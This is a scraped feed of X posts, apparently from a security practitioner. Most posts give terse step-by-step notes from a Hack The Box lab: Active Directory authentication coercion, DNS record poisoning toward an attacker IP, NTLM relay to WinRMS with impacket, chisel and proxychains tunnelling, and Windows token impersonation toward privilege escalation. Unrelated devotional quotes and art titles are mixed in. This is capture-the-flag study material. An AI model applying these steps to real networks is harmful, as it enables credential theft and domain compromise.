[X Link](https://x.com/anyuser/status/2022338743705956664)  2026-02-13T15:55Z [--] followers, [--] engagements


"01 process with token ; New-Win32Process -Commandline 'cmd.exe /c whoami /priv 2&1 /programdata/output.txt' -token $token; permissions granted we shall godpotato next using same approach"  
[X Link](https://x.com/anyuser/status/2022337812570497120)  2026-02-13T15:51Z [--] followers, [--] engagements


"00 get token ; impersonating pipe; get-NtToken -Impersonation ; $token.privileges SeImpersonatePrivilegeEnabledByDefault"  
[X Link](https://x.com/anyuser/status/2022337316220768725)  2026-02-13T15:49Z [--] followers, [--] engagements


"2015 [----] https://github.com/dmore/sandbox-attacksurface-analysis-tools-red-googleprojectzero https://github.com/dmore/sandbox-attacksurface-analysis-tools-red-googleprojectzero"  
[X Link](https://x.com/anyuser/status/2022336631626481980)  2026-02-13T15:46Z [--] followers, [--] engagements


"blog apr [----] win10 [----] sharing a logon session a little too much https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html"  
[X Link](https://x.com/anyuser/status/2022336471664099614)  2026-02-13T15:46Z [--] followers, [--] engagements


"The loveliest masterpiece of the heart of God is the heart of a mother. St. Therese of Lisieux 🕊"  
[X Link](https://x.com/anyuser/status/2020541595452313844)  2026-02-08T16:53Z 11.9K followers, [----] engagements


"Hail Mary full of Grace 🕊"  
[X Link](https://x.com/anyuser/status/2019505939297030488)  2026-02-05T20:18Z 11.9K followers, [----] engagements


"htb::signed; feb-2026; many esc; coerce dc01 auth via empty credential target; krbrelayx dnstool add dc011UWhRCA.AAYBAAAA (points to hacker ip) ; dfs coerce; nxc smb dc -u mssqlsvc -p pwd -M coerce_plus; impacket ntlmrelayx catch winrms interactive session; nc via proxychains"  
[X Link](https://x.com/anyuser/status/2021667511763448018)  2026-02-11T19:27Z [--] followers, [--] engagements


"exceptional impacket [----] [----] https://github.com/dmore/impacket-red-net-packet-maintainedby-coresecurity https://github.com/dmore/impacket-red-net-packet-maintainedby-coresecurity"  
[X Link](https://x.com/anyuser/status/2021672271912595877)  2026-02-11T19:46Z [--] followers, [--] engagements


"Vigilant Angel ✨"  
[X Link](https://x.com/anyuser/status/2021193427472564537)  2026-02-10T12:03Z [----] followers, [----] engagements


"Titans Awakening✨"  
[X Link](https://x.com/anyuser/status/2017605036348740091)  2026-01-31T14:25Z [----] followers, [----] engagements


"03 it relays coerced auth with impacket the auth to a winrms interactive session that we will be connecting with nc port [-----] through the chisel tunnel; auth vs WinRMS success; nc help and basic use to proof access http://ntlmrelayx.py http://ntlmrelayx.py"  
[X Link](https://x.com/anyuser/status/2021670917076893899)  2026-02-11T19:41Z [--] followers, [--] engagements


"02 launch responder; proxychains netexec smb -M coerce_plus module -on target failing dc01 that points to hacker ip.;dfs coerce attack; responder caught dc01 ntlmv2-ssp hash; auth succesfully coerced"  
[X Link](https://x.com/anyuser/status/2021669256275042399)  2026-02-11T19:34Z [--] followers, [--] engagements


"01 generate dns record that points to hacker ip instead of dc01 ip with (krbrelatyx) passing valid SIGNEDmssqlsvc -p pwd --add known broken name http://dnstool.py http://dnstool.py"  
[X Link](https://x.com/anyuser/status/2021668402209992830)  2026-02-11T19:31Z [--] followers, [--] engagements

Limited data mode. Full metrics available with subscription: lunarcrush.com/pricing